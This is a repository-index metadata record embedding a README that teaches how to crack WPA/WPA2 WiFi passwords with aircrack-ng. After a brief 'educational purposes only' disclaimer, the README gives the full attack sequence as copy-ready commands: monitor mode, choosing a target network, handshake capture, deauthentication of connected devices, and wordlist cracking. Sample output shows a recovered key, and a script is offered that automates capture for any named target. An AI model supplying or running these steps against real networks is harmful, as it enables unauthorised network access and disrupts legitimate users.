{"id":21536507,"url":"https://github.com/antoniosubasic/wifi-cracking","last_synced_at":"2025-03-17T20:26:39.513Z","repository":{"id":233979029,"uuid":"788123438","full_name":"antoniosubasic/wifi-cracking","owner":"antoniosubasic","description":"cracking WPA/WPA2 secured WiFi networks with the aircrack-ng suite","archived":false,"fork":false,"pushed_at":"2024-10-31T19:34:47.000Z","size":6346,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-24T07:29:44.245Z","etag":null,"topics":["aircrack-ng","cracking","hacking","wifi"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/antoniosubasic.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-04-17T20:22:44.000Z","updated_at":"2024-11-02T03:33:40.000Z","dependencies_parsed_at":"2025-01-24T07:37:28.097Z","dependency_job_id":null,"html_url":"https://github.com/antoniosubasic/wifi-cracking","commit_stats":null,"previous_names":["antonio-subasic/wifi-cracking","antoniosubasic/wifi-cracking"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antoniosubasic%2Fwifi-cracking","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antoniosubasic%2Fwifi-cracking/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antoniosubasic%2Fwifi-cracking/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antoniosubas
ic%2Fwifi-cracking/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/antoniosubasic","download_url":"https://codeload.github.com/antoniosubasic/wifi-cracking/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244104653,"owners_count":20398715,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aircrack-ng","cracking","hacking","wifi"],"created_at":"2024-11-24T03:19:54.704Z","updated_at":"2025-03-17T20:26:39.494Z","avatar_url":"https://github.com/antoniosubasic.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"cracking WPA/WPA2 secured WiFi networks with the aircrack-ng suite\n\n\u003e \u003cpicture\u003e\n\u003e   \u003csource media=\"(prefers-color-scheme: light)\" srcset=\"https://raw.githubusercontent.com/Mqxx/GitHub-Markdown/main/blockquotes/badge/light-theme/warning.svg\"\u003e\n\u003e   \u003cimg alt=\"Warning\" src=\"https://raw.githubusercontent.com/Mqxx/GitHub-Markdown/main/blockquotes/badge/dark-theme/warning.svg\"\u003e\n\u003e \u003c/picture\u003e\u003cbr\u003e\n\u003e This guide is for educational purposes only and should not be used for any illegal activities. 
The author and publisher are not liable for any illegal use.\n\n## Requirements\n\n-   [Kali Linux](https://www.kali.org/get-kali)\n-   [aircrack-ng suite](https://www.aircrack-ng.org) (pre-installed on Kali Linux)\n-   external WiFi adapter with [monitor mode](https://en.wikipedia.org/wiki/Monitor_mode) and packet injection capabilities ([PiAEK AC-1200 Mbps](https://www.amazon.de/PiAEK-Adapter-Wireless-Verl%C3%A4ngerungskabel-Unterst%C3%BCtzung/dp/B08BHY92R4) used in this guide)\n-   drivers for the external WiFi adapter ([rtl8812au](dependencies/rtl8812au-5.13.6.tar.gz) used in this guide)\n-   linux kernel headers (installed via _package manager_ or [_/pool/main/l/linux/_](https://http.kali.org/kali/pool/main/l/linux/)) - used in this guide:\n    -   [linux-headers-6.8.11-common_6.8.11-1kali2_all.deb](https://http.kali.org/kali/pool/main/l/linux/linux-headers-6.8.11-common_6.8.11-1kali2_all.deb)\n    -   [linux-kbuild-6.8.11_6.8.11-1kali2_amd64.deb](https://http.kali.org/kali/pool/main/l/linux/linux-kbuild-6.8.11_6.8.11-1kali2_amd64.deb)\n    -   [linux-headers-6.8.11-amd64_6.8.11-1kali2_amd64.deb](https://http.kali.org/kali/pool/main/l/linux/linux-headers-6.8.11-amd64_6.8.11-1kali2_amd64.deb)\n\n## Walkthrough\n\n### Enable monitor mode\n\n[Monitor mode](https://en.wikipedia.org/wiki/Monitor_mode) allows the WiFi adapter to capture all WiFi packets in the air. Before enabling monitor mode, make sure the WiFi adapter is connected to the system. Check this by running `iwconfig`. 
The adapter should be listed with a name like `wlan0` or `wlan1`:\n\n```\nwlan0     unassociated  ESSID:\"\"  Nickname:\"\u003cWIFI@REALTEK\u003e\"\n          Mode:Managed  Frequency=2.412 GHz  Access Point: Not-Associated\n          Sensitivity:0/0\n          Retry:off   RTS thr:off   Fragment thr:off\n          Power Management:off\n          Link Quality:0  Signal level:0  Noise level:0\n          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0\n          Tx excessive retries:0  Invalid misc:0   Missed beacon:0\n```\n\nTo enable monitor mode, we first need to stop processes that might interfere with the adapter:\n\n```bash\nsudo airmon-ng check kill\n```\n\nNext, we can enable monitor mode on the adapter:\n\n```bash\nsudo airmon-ng start wlan0 # replace wlan0 with the name of your adapter\n```\n\n### Look for target network\n\nTo find the target network, we can use `airodump-ng`, which is a tool from the _aircrack-ng_ suite. This tool lists all WiFi networks in the area, including their BSSID, ESSID, channel, etc.:\n\n```bash\nairodump-ng wlan0 # replace wlan0 with the name of your adapter (your adapter might have a different name after enabling monitor mode; run iwconfig to check)\n```\n\n```\nCH  0 ][ Elapsed: 0 s ][ 2024-04-18 18:55\n\nBSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID\n\nAA:AB:AC:AD:AE:AF  -99        5        0    0   1  100   WPA2 CCMP   PSK  myhomenetwork\n```\n\nWrite down the BSSID and channel of the target network.\n\n### Capture handshake\n\nWhen a device connects to a WiFi network, a so-called [handshake](https://medium.com/@hackersprey/wifi-handshake-cf1f3397a5cc) is exchanged between the device and the access point. This handshake can be captured and used to crack the WiFi password. 
To capture the handshake, we need to run `airodump-ng` again, but this time we need to specify the BSSID and channel of the target network:\n\n```bash\nairodump-ng -d AA:AB:AC:AD:AE:AF -c 1 --write handshake wlan0 # replace AA:AB:AC:AD:AE:AF with the BSSID of the target network, 1 with the channel of the target network and wlan0 with the name of your adapter\n```\n\nThis command starts listening for the handshake. Once a device connects to the target network, the handshake will be captured and saved to a file called `handshake-01.cap`. An indicator will show when the handshake is captured; it will appear on the first line after the date and time (you can safely stop the process with `Ctrl + C` after the handshake has been captured):\n\n```\nCH  0 ][ Elapsed: 0 s ][ 2024-04-18 18:55 ][ WPA handshake: AA:AB:AC:AD:AE:AF\n```\n\nOptionally, you can speed up the process by deauthenticating all devices currently connected to the target network and forcing them to reconnect and establish a new handshake:\n\n```bash\n# --deauth specifies the number of deauthentications to send (5 in this case)\naireplay-ng --deauth 5 -a AA:AB:AC:AD:AE:AF wlan0 # replace AA:AB:AC:AD:AE:AF with the BSSID of the target network and wlan0 with the name of your adapter\n```\n\n### Crack the password\n\nTo crack the password, we need to use a wordlist. A wordlist is a list of possible passwords that will be tried one by one until the correct password is found. In this guide, we will use the `rockyou.txt` wordlist, which is a popular wordlist that comes pre-installed on Kali Linux. To crack the password, we need to run `aircrack-ng` and specify the wordlist and the captured handshake:\n\n```bash\naircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap\n```\n\n```\n                               Aircrack-ng 1.7\n\n      [00:00:08] 40629/14344392 keys tested (4797.50 k/s)\n\n      Time left: 49 minutes, 41 seconds                          0.28%\n\n                           KEY FOUND! 
[ test1234 ]\n\n\n      Master Key     : 8F 5D 7E B8 B7 72 54 75 43 E7 BE 33 66 36 DC C6\n                       C6 99 AB 2B E6 5D C6 C1 40 B8 BD 66 52 A6 4A F4\n\n      Transient Key  : 32 2B 40 BA 56 02 E0 2D E9 25 B4 89 AE D8 58 5A\n                       08 73 1D 09 BD AE 94 B7 ED 14 9F BE 58 B5 30 85\n                       65 C1 ED 9C C9 33 08 DA 83 84 99 00 00 00 00 00\n                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n\n      EAPOL HMAC     : B7 D9 4F 14 7A 29 6F 3E B3 5C F8 E5 C0 F8 E1 EF\n```\n\nAnd voilà! The password was cracked in only **8 seconds** after testing **40629** other passwords. In this case, the password was `test1234`.\n\n## Script automation\n\nBecause the process of capturing the handshake is always the same and can be quite tedious, I've automated the process with a simple [bash script](dump.sh). It takes two parameters:\n\n1. (required) the name of the target network\n1. (optional) the name of the adapter - default: wlan0\n\nIt does all the steps until capturing the handshake and throws you directly into the _airodump-ng_ target network sniff. You only have to wait for the handshake to be captured and then run the _aircrack-ng_ command to crack the password.\n\n\u003cbr\u003e\u003cbr\u003e\n\n_credits to:_\n\n\u003e [The Morpheus Tutorials](https://youtu.be/GLmpLeghM2Y)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantoniosubasic%2Fwifi-cracking","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fantoniosubasic%2Fwifi-cracking","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantoniosubasic%2Fwifi-cracking/lists"}